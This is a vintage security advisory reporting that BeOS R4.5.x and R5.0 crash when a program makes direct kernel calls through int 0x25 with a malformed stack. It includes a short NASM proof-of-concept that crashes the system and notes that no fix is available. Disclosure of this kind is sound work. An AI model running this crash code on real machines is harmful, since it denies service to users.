COMMAND

    kernel

SYSTEMS AFFECTED

    BeOS

PROBLEM

    Konstantin Boldyshev  found following   BeOS crashes  when  system
    call with invalid parameters is issued.

    When using direct  kernel calls through  int 0x25 (not  libroot.so
    functions)  BeOS   dies  on   most  system   calls  with   invalid
    parameters/stack.   Allthough Be  has registered  this bug  before
    R5.0,  it  is  present  in  R5.0,  and  is present at least in all
    R4.5.x:

        http://bebugs.be.com/devbugs/detail.php3?oid=2324160

    Here's a sample assembly program that kills BeOS (nasm):

    section .text
    global _start
    
    _start:
    
	    push	dword msg
	    push	dword len
	    push	dword 1	;stdout
    
	    mov	eax,3	;sys_write
	    int	0x25	;must be a *call* to int 0x25,
			    ;then everything goes ok; i.e.
			    ;return address must be on the stack,
			    ;but it is not
    
	    mov	eax,0x3f	;sys_exit
	    int	0x25
    
    msg	db	"hello",0xa
    len	equ	$ - msg

    Source and binary can be downloaded at:

        http://linuxassembly.org/BeDie.tgz

SOLUTION

    No fix is available, it's a kernel bug.